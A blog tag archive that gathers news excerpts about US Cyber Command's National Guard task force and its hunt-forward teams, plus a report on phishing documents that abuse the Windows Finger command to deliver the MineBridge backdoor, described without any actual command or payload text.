Tag Archive for: command

National Guard task force that supports Cyber Command changes over


WASHINGTON — The Army recently announced a new tranche of National Guard units to staff a critical and ongoing task force for U.S. Cyber Command.

Members of the 123rd Cyber Protection Battalion — made up of guardsmen from Illinois, Minnesota, Virginia and Wisconsin — relieved the 124th Cyber Protection Battalion at the end of its 15-month deployment for Task Force Echo, an Army announcement said.

The task force was described at its outset in 2017 as the largest mobilization of reserve forces in cyberspace, and to date over 600 National Guardsmen have been assigned to it. Now in its fifth iteration, soldiers will begin a 12-month deployment based at Fort Meade in Maryland.

Few details are publicly known about the task force, other than that it supports full-spectrum cyber operations. While under the control of Army Cyber Command’s 780th Military Intelligence Brigade, which conducts offensive cyber operations for Cyber Command, the task force has supported Cyber Command’s Cyber National Mission Force, which conducts offensive cyber operations under the guise of defense to protect the nation from malicious cyber actors. Sources have indicated that it has also supported Joint Task Force-Ares, which seeks to limit the Islamic State group’s abilities in the digital world.

While not “trigger pullers,” sources have also indicated the task force provides infrastructure support.

The task force has been described as beneficial to all organizations involved.

“I was impressed by the soldiers of Task Force Echo IV. They brought their real-world experience managing networks to the Army and made our organization better,” Col. Matthew Lennox, commander of the 780th Military Intelligence Brigade, said at an awards ceremony for the outgoing battalion. “Their knowledge and experience enabled teams within the Cyber National Mission Force and the different service Joint Force Headquarters to accomplish their mission. The Task Force Echo soldiers were integral members of the brigade team.”

The Army in recent years has begun to incorporate the National Guard and Reserve forces into all aspects of its cyber mission.


Windows Finger command abused by phishing to download malware


Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims’ devices.

The ‘Finger’ command is a utility that originated in Linux/Unix operating systems and allows a local user to retrieve a list of users on a remote machine or information about a particular remote user. In addition to Linux, Windows includes a finger.exe command that performs the same function.

To execute the Finger command, a user would enter finger [user]@[remote_host]. For example, finger [email protected].

In September, we reported that security researchers discovered a way to use Finger as a LoLBin to download malware from a remote computer or exfiltrate data. LoLBins are legitimate programs that can help attackers bypass security controls to fetch malware without triggering a security alert on the system.

Finger used in an active malware campaign

This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.

FireEye first reported on the MineBridge malware after discovering numerous phishing campaigns targeting South Korean organizations. These phishing emails contain malicious Word documents disguised as job applicant resumes that install the MineBridge malware.

MineBridge phishing email
Source: FireEye

Like the previous MineBridge campaigns seen by FireEye, the one discovered by Sayre also pretends to be a resume from a job applicant, as shown below.

Malicious MineBridge word document
Source: BleepingComputer

When a victim clicks on the ‘Enable Editing’ or ‘Enable Content’ buttons, a password-protected macro will be executed to download the MineBridge malware and run it.

BleepingComputer was able to bypass the password-protection on the Word macro, which is shown below in its obfuscated form.

Obfuscated malicious Word Macro
Source: BleepingComputer

The deobfuscated command…


US Cyber Command now has teams around the world tracking hackers from Russia, China, Iran, N. Korea and more


The U.S. Cyber Command has sent teams to Europe, the Middle East, and Asia as part of increased U.S. efforts to track down Russian, Iranian, Chinese, and North Korean hacking groups ahead of election day.

Military officials told the New York Times that Cyber Command, which runs the military’s offensive and defensive cyber operations, has expanded on efforts it began in 2018 to track foreign hacking operations and identify the methods they were using to break into computer networks.

The 2018 efforts focused primarily on counteracting Russian cybersecurity threats, but have since expanded, with cyber teams being sent to the Middle East and Asia. A U.S. intelligence report in August warned of Russian efforts to denigrate Democratic presidential candidate Joe Biden, and Chinese and Iranian efforts to undermine President Donald Trump.

“Since 2018, we have expanded our hunt forward operations to all major adversaries,” Lt. Gen. Charles L. Moore Jr., the deputy head of Cyber Command, told the New York Times in an interview at Fort Meade, Maryland.

Cyber Command refers to its efforts to proactively find hacker groups as “Hunt forward operations.” Cyber Command efforts are reportedly aimed at getting close to foreign hacker groups to identify and potentially stop cyberattacks against the U.S.

Moore described the Cyber Command actions as a proactive effort to defend against hackers. He told the New York Times, “We want to take down the archer rather than dodge the arrows.”

Cyber Command continued to assist in operations against potential cyber-attacks following the 2018 election, and Moore said the anti-hacking efforts will continue past Election Day in 2020.

“We are not stopping or thinking about our operations slacking off on Nov. 3,” Moore told the New York Times. “Defending the election is now a persistent and ongoing campaign for Cyber Command.”

In 2018 Cyber Command reportedly sent teams to North Macedonia, Montenegro and other countries to learn more about Russian operations. Cyber Command also sent warnings to potential Russian trolls and reportedly worked to keep at least one Russian troll-farm offline on election day during the 2018 U.S. midterm elections.

Cyber Command also…


Report: US Cyber Command Behind Trickbot Tricks — Krebs on Security
